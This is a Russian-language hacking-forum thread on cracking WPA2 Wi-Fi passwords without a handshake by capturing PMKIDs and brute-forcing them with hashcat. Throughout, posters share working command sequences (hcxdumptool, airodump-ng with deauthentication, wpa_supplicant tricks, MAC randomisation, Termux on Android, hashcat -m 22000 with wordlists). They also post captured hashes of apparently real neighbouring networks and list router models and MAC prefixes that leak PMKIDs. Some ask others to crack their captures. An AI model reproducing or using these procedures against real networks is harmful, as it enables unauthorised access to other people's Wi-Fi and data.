Просмотр полной версии : Брут WPA2 без handshake используя PMKID + hashcat
При каждом запуске hcxdumptool, PMKID меняется, разве ключ WPA не постоянный?
ключ постоянный,но изменяются другие данные,например,MAC клиента
PSYDRUGS
29.09.2020, 16:36
Разобрался. Второе и третье поле уже есть, имя точки можно не декодировать, hcxdumptool выдаёт уже в готовом виде.
Таким образом правильный PMKID у меня получился: 7efc0aa4901f0a9fd9c70b691711e2a9*344b5017ffba*7802 f8209cd0*mgts_85
WPR его приняла, но 4ое поле SSID, нужно вбивать вручную, программа его не подхватывает, видимо нужна в зашифрованном виде.
Проверил PMKID с заранее известным паролем, при описанных выше манипуляциях WPR выдала совпадение PMK и PMKID. Метод работает.
имя точки можно не декодировать
mgts_85
но 4ое поле SSID, нужно вбивать вручную, программа его не подхватывает, видимо нужна в зашифрованном виде.
SSID в HEX формате
http://www.unit-conversion.info/texttools/hexadecimal/
mgts_85
>
6d6774735f3835
PSYDRUGS
29.09.2020, 22:19
Заметил последние AP мгтс_гпон и ростелеком с MAK 10:A3:*, PMKID не отдает, не отдают любые Кинетики и Тп-Линк, современные Д-Линки.
Утилита иногда выдает символы с подзаголовком PMKIDROGUE, как я понимаю этот набор нельзя рассматривать как полноценный PMKID или можно?
bravephoenix748
03.10.2020, 18:23
Aircrack-ng, к сожалению, не проверяет PMKID на валидность, то есть не состоит ли он из нулей; это здесь обсуждалось.
С тех пор, как я узнал, что PMKID можно ловить без режима мониторинга, всегда ловлю его так и проблем не знаю.
Немного не так -короче те точки которые отдавали валидный PMKID с помощью aircrack-ng также отдают также валидный
PMKID с помощью вашей команды
wpa_passphrase "" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1
а те что не давали валидного с aircrack-ng дают тоже самое
http://i-fotki.info/26/b585698e7f49b11eb67ed8778ff037896dad6e384394616.pn g.html
larinvlad
09.11.2020, 17:23
Подскажите, как преобразовать данные, полученные с помощью wpa супликанта в формат для хэшкэта/Wireless Password Recovery?
Вот получил: RSN: PMKID from Authenticator - hexdump(len=16): af 01 67 05 c9 32 2a 12 d1 de fd d1 99 91 71 b9 что дальше?
В hcxdumptool можно конвертировать полученные данные в норм вид, типа: 7efc0aa4901f0a9fd9c70b691711e2a9*344b5017ffba*7802 f8209cd0*6d6774735f3835, а здесь как, не совсем ясно.
Подскажите, как преобразовать данные, полученные с помощью wpa супликанта в формат для хэшкэта/Wireless Password Recovery?
Вот получил: RSN: PMKID from Authenticator - hexdump(len=16): af 01 67 05 c9 32 2a 12 d1 de fd d1 99 91 71 b9 что дальше?
В hcxdumptool можно конвертировать полученные данные в норм вид, типа: 7efc0aa4901f0a9fd9c70b691711e2a9*344b5017ffba*7802 f8209cd0*6d6774735f3835, а здесь как, не совсем ясно.
https://forum.antichat.ru/threads/464369/page-2#post-4238069
Вот получил: RSN: PMKID from Authenticator - hexdump(len=16): af 01 67 05 c9 32 2a 12 d1 de fd d1 99 91 71 b9 что дальше?
Вы получили строку с PMKID (требуется удалить пробелы). Вам нужно знать ESSID и BSSID точки доступа, а также MAC-адрес вашей беспроводной карты. Последний можно узнать командой:
iw dev
Из BSSID, MAC удаляете разделители, а ESSID преобразовываете в HEX с помощью сервиса.
Затем просто составляете строку формата:
pmkid*bssid*mac*essid
и записываете в файл с расширением .16800, который можно скормить Hashcat.
WiFiPR: находите конструктор PMKID и заполняете поля этими данными.
bravephoenix748
11.11.2020, 17:41
Подскажите, как преобразовать данные, полученные с помощью wpa супликанта в формат для хэшкэта/Wireless Password Recovery?
Вот получил: RSN: PMKID from Authenticator - hexdump(len=16): af 01 67 05 c9 32 2a 12 d1 de fd d1 99 91 71 b9 что дальше?
В hcxdumptool можно конвертировать полученные данные в норм вид, типа: 7efc0aa4901f0a9fd9c70b691711e2a9*344b5017ffba*7802 f8209cd0*6d6774735f3835, а здесь как, не совсем ясно.
Если только в Wireless Password Recovery то проще с помощью конструктороа PMKID.
https://www.passcape.com/wireless_password_recovery_pmkid_constructor_rus
А если c помощью aircrack-ng ловите PMKID вставляетсая как и хендшейк в виде .cap файла
AMAC это точка доступа ,а SMAC это ваш адаптер.Обратие внимание если у вас стоит в /etc/NetworkManager/conf.d/mac.conf
как в Porteuse по умолчанию(клонирование мас)
wifi.cloned-mac-address=stable то тот котрый был в момент подклбчения...
А если c помощью aircrack-ng ловите PMKID вставляетсая как и хендшейк в виде .cap файла
Важное замечание: в Aircrack-ng 1.6 добавлена возможность подавать PMKID как строку:
aircrack-ng -I "a33b5ba86374d241ab527a500124789b*c4c9ec10d0d2*acde 489a876d*522d6c696e65" -w /path/to/dictionary
erwerr2321
23.01.2021, 16:54
@4Fun (https://forum.antichat.xyz/members/324235/), прив!
Скажи, а есть где более-менее полный список устройств отдающих PMKID, по типу твоего для Pixie-Dust!?
Не помешало бы его или ссылку на него добавить в шапку, да и твой тоже в соответствующей теме!
Скажи, а есть где более-менее полный список устройств отдающих PMKID, по типу твоего для Pixie-Dust!?
Наработки в этом направлении есть, но полноценного списка нет. Собирал данные (BSSID, в первую очередь) с wpa-sec.stanev.org, с темы перебора на этом форуме. В планах насобирать большое количество различных BSSID и обобщить этот список в список шаблонов (можно сказать, регулярных выражений или масок).
Af5G4337
04.03.2021, 11:31
Всем доброго!
Пытаюсь проводить мероприятия в данном направлении. Поступаю так. Обычным аирслаксом сканирую сети, выбираю интересующую, включаю перехват и если клиентов нет, то просто пытаюсь подключиться с другого устройства. Потом смотрю акулой захваченный сар файл и всю необходимую инфу оттуда выцепляю. Заметил некоторую особенность, а именно:
1. некотрые точки легко отдают все, мне необходимые, данные включая рмк
2. некоторые вообще не отдают ни одного еапол пакета, хоть тресни.
3. некоторые отдают рмк с номером 0400000000000000.....
4. а вот некоторые, сперва молчат ка рыба об лед, а потом отдают валидный рмк но совсем не с первого, а с пятого - десятого подключения.
Четвертый пункт мне показался интересным, сразу скажу, что все происходит с нормальным или хорошим уровнем сигнала, дальнобоем вообще не интересуюсь.
Наверное тут на форуме было это уже много раз тут. Но я лично не читал пока что про прогу CommView
В ролике довольно быстро и просто вроде бы поймал - Pmkid:
Конектился к wi-fi точке - с Любым паролем
Extract PMKID On Windows Using CommView To Be Used On HashCat - YouTube
Конектился к wi-fi точке - с Любым паролем
Получилось?
CommView - отстой!!!
Получилось?
CommView - отстой!!!
он в ролике коннектился с Произвольным паролем. У него вроде получилось. посмотрите ролик
erwerr2321
06.03.2021, 00:01
CommView
посмотрите ролик
Использовать это поделие и тем более рекомендовать его кому-либо, тут считается моветоном!
Я протестил захват PMKID с помощью aircrack-ng-не всё так плохо.WifiSlax 4.12 программа WifiMetrropolis
а ты не знаешь, что делать с этим Key , который мне выдала прога (или роутер ? ) на вкладке Other в WifiSlax 4.12 в программе WifiMetrropolis 3 ?
это вообще что за аттака ? по wps ?
попробовал с этим кеем приконнектиться к wi-fi - Tenda_E39820 - не коннектиться.
потом попробовал его ввести как wps ключ и потом скан по wps через Reaver (в Airslax 5.14 pro) - но тишина.
https://clip2net.com/s/4bd9hR8
dart8888
30.05.2021, 03:06
да странно что в терминале часто при поимке хш вылазит типа "обнаружен мпкид" - по сути то одно и тоже? но отдельно не записывает (( печалька.
bravephoenix748
30.05.2021, 19:51
http://f26.ifotki.info/thumb/6194f573e5997ebc428d0c7ae39634a55e19a9405049245.pn g
Я начинаю ловить PMKID cначала WifiMetropolis тк сразу получается PMKID в формате cap и его можно вставить сразу в WPR не извлекая вручную.Также сразу можно проверить на валидность пойманный PMKID нажав кнопку Aircrack-ng -там сразу видно валидный он или нет.
Короче очень быстро ловится или если не ловится то понимаешь что он вообще не поймается тк нет клиентов.Тогда переходите к способу
wpa_passphrase "" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1
Короче как выбрали целевую точку при сканировании- есть клиенты или нет сразу глушите точку- нажимайте кнопку DesAutenticacion(которая крайне правая и красная)
Если клент есть он появится через 5-10 сек.Если нет то он и не появится.Наверное aircrack-ng скачет по каналам и не всегда видит клиентов.А тут когда сканируете на отельном канале то они появляются бытро.Если есть клиенты то нажимайте DesAutenticacion(левая чёрная)
Естественно aircrack-ng 1.6 должен быть установлен.Кстати пользуюсь Wifislax 4.12 XFCE поздние версии KDE а это вроде зло
http://f26.ifotki.info/thumb/8bda1ebb09f26b7decf417bebeae64d55e19a9405050286.pn g
Кстати разработчики Kali наконец-то по умолчанию ставаят самое нормальное окружение XFCE
Kevin Shindel
15.09.2021, 23:16
Ребята помогите распарсить файлик.
Запустил так ...
hcxdumptool -i wlan0 --disable_disassociations -o test.pcapng --enable_status=15
потом сконвертил в новый формат.
hcxpcapngtool -o test.22000 test.pcapng
на выходе файлик test.22000, содержание вида:
WPA*02*245863d2dde9eef882993e5ff83a5478*18a6f7f88e 50*ec6c9a674ef2*554b7274656c65636f6d5f463838453530 *4ac1b5a688571792942695c66f672a836534df844ced1f8c3 0b926aaff75a233*0103007502010a00000000000000000002 a86bec58dc2aa88e46c404401b77d0ba37e84dc1c7bfe6b3ed bac79a7786c931000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000000001630140100000fac040100000fac040100000f ac020000*02
WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ec ae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212 809c9929a40a94cfe6fe8161d101a42e4030563*0103007502 010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c8 1964faa7f44076fc40150affcb58b5ba3bbfb3000000000000 00000000000000000000000000000000000000000000000000 0000000000000000000000000000000000001630140100000f ac040100000fac040100000fac028000*02
WPA*02*6dc7fbe45c007f66c8e4a4b4afcbf4ae*b0957526ec ae*c8d71940c017*56696b61*a6c625bbffcaa90524c833707 282bb0db9ddaa7da3ab494823d553524c457e42*0203005f02 030a001000000000000000027f0a607246336a6fe230e192fe f5876b835b07dba5572c7760baf54993a68501000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000*05
Вопрос кто подскажет что в этой строке нужное ... я так понимаю тут несколько сетей.
Как определить какая из них какая ?
WPA*02*245863d2dde9eef882993e5ff83a5478*18a6f7f88e 50*ec6c9a674ef2*554b7274656c65636f6d5f463838453530 *4ac1b5a688571792942695c66f672a836534df844ced1f8c3 0b926aaff75a233*0103007502010a00000000000000000002 a86bec58dc2aa88e46c404401b77d0ba37e84dc1c7bfe6b3ed bac79a7786c931000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000000001630140100000fac040100000fac040100000f ac020000*02
WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ec ae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212 809c9929a40a94cfe6fe8161d101a42e4030563*0103007502 010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c8 1964faa7f44076fc40150affcb58b5ba3bbfb3000000000000 00000000000000000000000000000000000000000000000000 0000000000000000000000000000000000001630140100000f ac040100000fac040100000fac028000*02
Вопрос кто подскажет что в этой строке нужное ... я так понимаю тут несколько сетей.
Как определить какая из них какая ?
HEX > ASCII
554b7274656c65636f6d5f463838453530 - UKrtelecom_F88E50
56696b61 - Vika
Kevin Shindel
16.09.2021, 10:18
Тут получаются разные хэши изза того что разные маки использовались для конекшена... уже понял.
WPA*02*36ef67111a8830d46d794bb7584fef7b*b0957526ec ae*4c5e0c1116dc*56696b61*e032040b5ba71c26ae7c63212 809c9929a40a94cfe6fe8161d101a42e4030563*0103007502 010a0000000000000000000148c2ae9d4ba880c9c7c0cf30c8 1964faa7f44076fc40150affcb58b5ba3bbfb3000000000000 00000000000000000000000000000000000000000000000000 0000000000000000000000000000000000001630140100000f ac040100000fac040100000fac028000*02
WPA*02*6dc7fbe45c007f66c8e4a4b4afcbf4ae*b0957526ec ae*c8d71940c017*56696b61*a6c625bbffcaa90524c833707 282bb0db9ddaa7da3ab494823d553524c457e42*0203005f02 030a001000000000000000027f0a607246336a6fe230e192fe f5876b835b07dba5572c7760baf54993a68501000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000*05
Спасибо большое!
Kevin Shindel
18.09.2021, 22:53
Еще вопрос как запустить софтину на 5 герцах?
Указывать каналы через запятую как то не очень...
Кто подскажет - ловил хэндшейк по обыкновению с помощью airodump-ng, точка была без клиентов - наконец появился, решил воспользоваться случаем - airodump-ng выдал сначала сообщение о пойманном pmkid, потом о пойманном хэндшейке (раньше только о хэндшейке сообщал - недавно обновлял арч, видимо новое), cap конвертировал через сайт hashcat в hc22000, ниже содержание файла. Т.е. понятно, обе записи для одного реального клиента (мак один и тот-же) - первая pmkid, вторая - pmkid+хэндшейк, смущает то, что поле pmkid отличается - разве для одного и того-же клиента оно не должно совпадать? Т.е. одна из записей вероятно не валидна?
WPA*01*ad311cb09a62909eababf5a2e04344f1*749d79ac13 7a*50b7c3d07526*52542d47504f4e2d31333741***
WPA*02*8d169d6c8ca1273778c20d6367cfa496*749d79ac13 7a*50b7c3d07526*52542d47504f4e2d31333741*aa43069a2 bc750549cab7cf0a25dbcb33887b46717a152995f2b8a29309 910d0*0103007502010a00000000000000000000d0759f5923 8553ad392c083f180e3fece37867f9c48d6be17c4b6da316da 42c20000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 001630140100000fac020100000fac040100000fac023c00*a 2
Т.е. одна из записей вероятно не валидна?
pmkid годен у двух записей.
Просто пароль там сложный и долго нужно перебирать.
Вы уж если ведете речь о пойманном хэндшейке так и выклажывайте его, а не огрызки обработки.
Хотя тут и так ясно.
pmkid годен у двух записей.
Просто пароль там сложный и долго нужно перебирать.
Вы уж если ведете речь о пойманном хэндшейке так и выклажывайте его, а не огрызки обработки.
Хотя тут и так ясно.
Я именно в этой теме спросил, т.к. хотел уточнить про разные pmkid у одного и того же клиента - про пароль в курсе, выложил недавно в платную тему, но за такое (31^8) вряд ли кто возьмётся. Просто там пост с пойманным отдельно pmkid в hcxdumptool (не было клиентов), хотелось удостоверится что он не левый получился (т.е. разные - это нормально). А почему разные у одного клиента (про пост выше)? - я думал он рассчитывается исходя из мак точки, мак клиента имени точки и пароля wpa (я просто в хэшах не особо, вероятно ещё какакая-то информация подмешивается?).
VasiliyP
14.11.2021, 17:41
А почему разные у одного клиента (про пост выше)? - я думал он рассчитывается исходя из мак точки, мак клиента имени точки и пароля wpa (я просто в хэшах не особо, вероятно ещё какакая-то информация подмешивается?).
PROTOCOL*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR
PROTOCOL = Fixed string "WPA"
TYPE = 01 for PMKID, 02 for EAPOL
PMKID/MIC = PMKID if TYPE=01, MIC if TYPE=02
MACAP = MAC of AP
MACCLIENT = MAC of CLIENT
ESSID = network name (ESSID) in HEX
ANONCE = ANONCE
EAPOL = EAPOL (SNONCE is in here)
MESSAGEPAIR = Bitmask:
WPA*01*... - Вот этот только PMKID
PROTOCOL*TYPE*PMKID/MIC*MACAP*MACCLIENT*ESSID*ANONCE*EAPOL*MESSAGEPAIR
PROTOCOL = Fixed string "WPA"
TYPE = 01 for PMKID, 02 for EAPOL
PMKID/MIC = PMKID if TYPE=01, MIC if TYPE=02
MACAP = MAC of AP
MACCLIENT = MAC of CLIENT
ESSID = network name (ESSID) in HEX
ANONCE = ANONCE
EAPOL = EAPOL (SNONCE is in here)
MESSAGEPAIR = Bitmask:
WPA*01*... - Вот этот только PMKID
Вот, спасибо оно ) - теперь ясно - варьируется PMKID/MIC, и не подумаешь.
Ещё хотел такой своеобразный вопрос задать - нельзя ли в hcxdumptool задать мак фейкового клиента (которого она "подключает")? - просто эксперимент хочется провести с одним и тем-же клиентом - в хэлпе вроде как нет такого, т.е. по умолчанию каждый раз новый генерируется.
VasiliyP
14.11.2021, 20:45
нельзя ли в hcxdumptool задать мак фейкового клиента (которого она "подключает")?
Только код править, вот строчки, где он рандомизируется https://github.com/ZerBea/hcxdumpto...650a6d38b356319f697/hcxdumptool.c#L8084-L8091
Можно забить туда константы. Только не забудьте, что первый байт MAC нельзя "от балды" ставить.
А проще и быстрее подключаться самому, с другого клиента. В телефон можно вбить любой пароль, и подключаться.
Только код править, вот строчки, где он рандомизируется https://github.com/ZerBea/hcxdumpto...650a6d38b356319f697/hcxdumptool.c#L8084-L8091
Можно забить туда константы. Только не забудьте, что первый байт MAC нельзя "от балды" ставить.
А проще и быстрее подключатся самому, с другого клиента. В телефон можно вбить любой пароль, и подключаться.
Ок, спасибо.
PMKD захвачен на обычном андроиде, при подключении к сети, tcpdump-ом:"
картинка в посте пропала.
Я правильно понимаю, что tcpdump не пишет никаких слов/сообщение, что пойман pmkid?
это только при анализе дампа (в акуле, например) можно узнать?
VasiliyP
06.01.2022, 20:02
Я правильно понимаю, что tcpdump не пишет никаких слов/сообщение, что пойман pmkid?
Не пишет. Но, сколько я видел этих пакетов, pmkid всегда в конце. Поэтому, можно распечатать содержимое первого пакета (ключ -x), если там не нули в конце, это оно. Ну, или смотреть специализированным софтом.
goginnm12
01.02.2022, 22:15
Собирал данные (BSSID, в первую очередь)
развлекаюсь ваншотом (встроенная в телефон карта не всё может). он в лог сохраняет только имя, мак, пин и пас. если есть команда добавляющая данные, которые возвращает устройство "о себе" готов по возможности выгулять его)
что б два раза не вставать:
PMKID на android при помощи tcpdump
1. установить tcpdump (для termux)
pkg install tcpdump
2. запустить команду:
sudo tcpdump -nei wlan0 -s0 -xx -vv -w PMKID_$(date +"%Y-%m-%d-%H:%M:%S").cap
3. подключиться с любым паролем (например 11111111) к точке(ам), контролировать получение пакетов в терминале
4. прервать экзикуцию, обработать полученный файл
Доброго дня. Подскажите знающие рабочий способ на сегодняшний день получить PMKID.
Например через VMware.
erwerr2321
03.02.2022, 00:01
Доброго дня. Подскажите знающие рабочий способ на сегодняшний день получить PMKID.
Например через VMware.
Да способ вроде прежний, инициируете подключение с произвольным паролем, и смотрите в EAPOL пакете ( 1 of 4 ) отдала ли точка PMKID.
А точки либо не отдают его вообще, либо отдают с нулевым значением, либо отдают годный к перебору PMKID.
Для VMware скорее всего вам потребуется внешний WiFi адаптер!
Да способ вроде прежний, инициируете подключение с произвольным паролем, и смотрите в EAPOL пакете ( 1 of 4 ) отдала ли точка PMKID.
А точки либо не отдают его вообще, либо отдают с нулевым значением, либо отдают годный к перебору PMKID.
Для VMware скорее всего вам потребуется внешний WiFi адаптер!
В общем получил вот такое. Чем-то оно полезно?
WPA*02*2c9e9eaf659a11303ea4131a8e44ebbc*50ff2061a1 97*9c28f788a1b6*4b65656e657469632d33353434*b8f5260 56bc4b4b2767d2fc22f68727617926b1b590f833a56fdc0f20 dd216da*0103007502010a00000000000000000005bbeaedad e42c4b2178ece9437158c43a493d4c69e68f619f2d5d796f87 69415000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00001630140100000fac040100000fac040100000fac020000 *00
Вот это 50ff2061a197 понятно mak, 4b65656e657469632d33353434 - это ssid. Дальше не знаю(
erwerr2321
03.02.2022, 00:48
В общем получил вот такое. Чем-то оно полезно?
WPA*02*MIC*MAC_AP*MAC_CLIENT*ESSID*NONCE_AP*EAPOL_ CLIENT*MESSAGEPAIR
а PMKID
WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID***
Взято здесь https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
WPA*02*MIC*MAC_AP*MAC_CLIENT*ESSID*NONCE_AP*EAPOL_ CLIENT*MESSAGEPAIR
а PMKID
WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID***
Взято здесь https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2
значит PMKID не получен. Я правильно понимаю?
Чет у меня разные свистки на чипах rt3070 вешаются примерно на таких моментах. (приходится реконнектить свисток). Причем pmkid ловил через аиродамп, когда ловил хендшейк. И я подумал мб есть какой-то патченный или модифицированный драйвер под этот чип? Как-то они неочень хорошо отрабатывают по-моему...
Добрый день, друзья. Споймал PMKID, может кто - то переделать для кота. Спасибо
https://transfiles.ru/cl2g6
174region174
01.06.2022, 07:48
Чет у меня разные свистки на чипах rt3070 вешаются примерно на таких моментах. (приходится реконнектить свисток). Причем pmkid ловил через аиродамп, когда ловил хендшейк. И я подумал мб есть какой-то патченный или модифицированный драйвер под этот чип? Как-то они неочень хорошо отрабатывают по-моему...
Скорее всего этот роутер не отдаёт PMKID. А скрипт не вешается. Просто не происходит в сети ни чего нового и ему нечего обновлять по информации на мониторе. Вот и кажется будто он висит.
D9d9_tol9
26.08.2022, 18:02
Всем привет. Подскажите, пожалуйста, мой алгоритм действий правильный?
Прибиваем все лишнее и рандомизируем МАС
airmon-ng check kill
ifconfig wlan0 down
macchanger -r wlan0
ifconfig wlan0 up
Переводим карточку в режим мониторинга
airmon-ng start wlan0
Собираем общую инфу о происходящем вокруг
airodump-ng wlan0mon --wps --manufacturer --uptime --ignore-negative-one --write last_dump
Далее либо получаем PMKID либо Аэродампом, но с одного роутра
airodump-ng --bssid CC:2D:E0:AA:BB:CC -c 6 --write AP_crack wlan0mon --wps --manufacturer --uptime
либо со всех доступных
hcxdumptool -i wlan0mon -o PMKID --enable_status=1
Далее конвертируем
hcxpcapngtool -o clean_PMKID.22000 --all PMKID
Скармливаем коту файл с собранной инфой.
hashcat -m 22000 --status -w 3 clean_PMKID.22000 top1Mpassword.txt
Собственно, 2 вопроса. Правильны ли мои действия? И все ли хеши в файле clean_PMKID.22000 проверяет hashcat?
Уже начал сомневаться в правильности действий, не могу набрутить пароли...
CRACK211
22.10.2022, 22:49
Кто в курсе, как ловить pmkid с телефона ? Может софт есть ?
Кто в курсе, как ловить pmkid с телефона ? Может софт есть ?
Ищи.Где-то тут точно про это было.
CRACK211
23.10.2022, 15:44
wpa_passphrase "" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1
Пробую эту команду в termux. Выдаёт такую ошибку
CANNOT LINK EXECUTABLE "wpa_passphrase": library "libcrypto.so.3" not found: needed by main executable
Как можно это исправить?
Ps. Разобрался установил это и заработало
pkg install nodejs-lts
library "libcrypto.so.3" not found
В системе либо отсутствует сама либа или она не слинкована куда нужно.Если тело рутовано,поищи поиском в / дабы убедиться в ее отсутствии.
CRACK211
23.10.2022, 15:57
Да но теперь другая проблема. Iwconfig не показывает wifi карту. Пусто (
Да но теперь другая проблема. Iwconfig не показывает wifi карту. Пусто (
Вот тут не знаю.Мож ребутнуть?
CRACK211
23.10.2022, 16:45
Вот тут не знаю.Мож ребутнуть?
Не помогло. При чем 2 телефона samsung I xiaomi . Termux не видет wifi карту
iwconfig
lo no wireless extensions.
rmnet0 no wireless extensions.
rmnet1 no wireless extensions.
Не видет и все ( и бусибокс установил и рут права дал. Не видит ( есть ещё способ ловить pmkid ?
CRACK211
23.10.2022, 23:54
Походу дела проблема в 12 Андроиде. Как написано в этой статье в 12 термукс не работает нормально и решаться с помощью. Rtfm но что такое rtfm я не понял. Подскажите пожалуйста что такое RTFM????
https://habr.com/ru/post/652633/
Rtfm но что такое rtfm я не понял.
https://www.google.com/search?q=rtfm+это
CRACK211
26.10.2022, 14:35
Всем спасибо. разобрался заработало)
CRACK211
28.10.2022, 13:29
Может кто собирает данные в таблицу
HUMAX HG100RE-AK от акадо отдаёт pmkid. Может кому пригодится
SAGEM F@ST 3686 V2.2 тоже отдаёт PMKID
Asus RT-AC88U уязвим
CRACK211
04.11.2022, 15:41
00:F8:1C:8C (HUAWEI TECHNOLOGIES CO.,LTD) тоже отдает pmkid
ловил с помощью ewsa 7.30.593
CRACK211
04.12.2022, 15:25
Новый способ ловли pmkid с Андроид (termux). Из плюсов можно сразу Брут по словарю запустить, не нужен РЕЖИМ МОНИТОРА, НЕ РАБОТАЕТ С ЗАБЛОКИРОВАННЫМ ЭКРАНОМ ТЕЛЕФОН ДОЛЖЕН БЫТЬ АКТИВНЫМ окно termux должно быть открыто. Спасибо большое @goginnm12 (https://forum.antichat.xyz/members/314403/)
sudo pip3 install --upgrade https://github.com/Sinf0r0s0/pmkid-auto/tarball/master
запуск
только сбор
sudo pmkidauto -i wlan0 -s 10 -t 20
сбор и проверка по словарю
sudo pmkidauto -i wlan0 -w tiny_wordlist.txt -s 10 -t 20
CRACK211
06.12.2022, 18:53
00f81c
1cb72c
2c4d54
382c4a
4c5e0c
8c5973
ac220b
c486e9
c85195
c8b373
cc2de0
ce2de0
d4bf7f
d4bf7f
d850e6
e03f49
fc9435
отдают pmkid
CRACK211
14.12.2022, 15:35
708bcd
cc4eec
cc3540
302478
a408f5
e03f49
Новый способ ловли pmkid с Андроид (termux). Из плюсов можно сразу Брут по словарю запустить, не нужен РЕЖИМ МОНИТОРА, НЕ РАБОТАЕТ С ЗАБЛОКИРОВАННЫМ ЭКРАНОМ ТЕЛЕФОН ДОЛЖЕН БЫТЬ АКТИВНЫМ окно termux должно быть открыто. Спасибо большое @goginnm12 (https://forum.antichat.xyz/members/314403/)
sudo pip3 install --upgrade https://github.com/Sinf0r0s0/pmkid-auto/tarball/master
запуск
только сбор
sudo pmkidauto -i wlan0 -s 10 -t 20
сбор и проверка по словарю
sudo pmkidauto -i wlan0 -w tiny_wordlist.txt -s 10 -t 20
А как отдельно запустить брут на уже найденные хэши?
CRACK211
23.12.2022, 23:26
А как отдельно запустить брут на уже найденные хэши?
sudo pmkidauto -w tiny_wordlist.txt -c
А как отдельно запустить брут на уже найденные хэши?
Разобрался. Но либо ститает так медленно либо зависает. Прогресса не видно. В файле два хеша было и словарь на 1000 паролей. Минут двадцать ждал, так ничего и не выдало.
CRACK211
23.12.2022, 23:56
Разобрался. Но либо ститает так медленно либо зависает. Прогресса не видно. В файле два хеша было и словарь на 1000 паролей. Минут двадцать ждал, так ничего и не выдало.
Медленно Брут идёт. Брут идёт на процессоре без gpu.у меня Брут идёт быстрее. Snap 8 gen 1
https://cloud.mail.ru/public/rKpn/Aa49b9avg Дождался. Очень медленно считает. У кого-нибудь есть возможность проверить хотя бы от 3WiFi словариком, если я файл с хешами скину? На руках, просто, один телефон, доступа к ББ нет.
Hash Sutie Droid перебирает этот словарь (на 1000 паролей который) со скоростью 1.2К за 2мин. 40 сек. Но ему .cap файл нужен(
CRACK211
24.12.2022, 00:43
Hash Sutie Droid перебирает этот словарь (на 1000 паролей который) со скоростью 1.2К за 2мин. 40 сек. Но ему .cap файл нужен(
Выкладывай посмотрю
Выкладывай посмотрю
У меня интернет ужастный. Даже файл весом 300kB не выгружается. Вбей в google HashSuiteDroid 1.6, там куча сайтов откуда скачать можно.
CRACK211
24.12.2022, 01:27
https://cloud.mail.ru/public/rKpn/Aa49b9avg Дождался. Очень медленно считает. У кого-нибудь есть возможность проверить хотя бы от 3WiFi словариком, если я файл с хешами скину? На руках, просто, один телефон, доступа к ББ нет.
Да я за хэш говорил . У меня есть эта программа
CRACK211
24.12.2022, 01:27
У меня интернет ужастный. Даже файл весом 300kB не выгружается. Вбей в google HashSuiteDroid 1.6, там куча сайтов откуда скачать можно.
Она в GP есть
Вот
https://transfiles.ru/bq4ou
Доброй вечер ребята как решить эту проблему ?
Hash_Cr4cker
13.01.2023, 00:02
Доброй вечер ребята как решить эту проблему ?
-m22000
-m22000
рубить. Благодарю
tkaramel
23.01.2023, 04:44
Метод отличный, многие сети поддаются.
Карты ralink и intel.
e4-26-86-Dwnet
48-ad-d8-Huawei
9c-37-f4-Huawei
отдают pmkid
C0D3BR34K3R
04.08.2023, 12:34
Добавлю, что hcxdumptool позволяет получить PMKID не только с точки доступа, но и с клиента
При конвертации с помощью hcxpcapngtool в формат 22000
MESSAGEPAIR будет равен 10
что означает, что PMKID взят с клиента
WPA*01*PMKID*MAC_AP*MAC_CLIENT*ESSID***MESSAGEPAIR
Bitmask of the MESSAGEPAIR field for PMKID (WPA*01):
0: reserved
1: PMKID taken from AP
2: reserved
4: PMKID taken from CLIENT (wlan.da: possible MESH or REPEATER)
5: reserved
6: reserved
7: reserved
libvernow
15.08.2023, 05:56
бодрого утречка
дайте отклик, у кого получилось хотя бы однажды снять PMKID с Iskratel Innbox e80
хочу понять для себя, имеет ли смысл вообще пытаться, или данная модель тупо не отдаёт никогда PMKID
вот у меня лично, в течении полутора месяцев дрюченья двух таких аппаратов, ни один, ни разу, не выслал PMKID, ни косой, ни кривой
сигнал хороший, одна точка -61dBm, другая -55dBm, похоже дело явно не качестве связи
Всем привет! Возможно не совсем по теме вопрос.
Почему в теме подбора паролей вай фай все выкладывают хэндшейки .cap, а не хеш .hc22000? Разве метод, описанный в этой теме не является более актуальным и эффективным? В итоге помогающим придется же конвертировать .cap в .hc22000, чтобы брутить hashcat’ом, или я чего-то не понимаю?))
придется же конвертировать .cap в .hc22000, чтобы брутить hashcat’ом, или я чего-то не понимаю?))
Не все брутят hashcat'ом, да и не все брутят последний версией кота
А вот с этолонного САР файла во что угодно можно сконвертировать, каждому вочто надо.
Piligrim740
17.01.2024, 10:02
этолонного САР файла
По мимо этого, в формате САР, есть масса полезной информации.
К примеру, включен ли WPS, наличие валидных пакетов по таймингам.
Не все брутят hashcat'ом, да и не все брутят последний версией кота
Так и есть, у меня вот в ходу Wireless Password Recovery
Кто использовал этот метод на железе макбука?
sclovesun
08.10.2024, 23:09
Возможно кому-то пригодится мой опыт.
Активирую получение хендшейка с точки, у которой нет клиентов. Со второго устройства подключаюсь к ней, ввожу пароль 12345678. Хендшейк пойман.
Иду на cap2hashcat/, скармливаю cap файл, на выходе в handshake extraction в числе прочего вижу строки:
RSN PMKID (total)........................: 1
RSN PMKID (best).........................: 1
RSN PMKID written to 22000 hash file.....: 1
что говорит о том, что pmkid получен и записан в итоговый .22000. По итогу в коте при переборе будет строка "Recovered........: 2/2 (100.00%) Digests (total), 1/2 (50.00%)", т.е. один пароль наш не верный, 12345678, а другой - верный из PMKID.
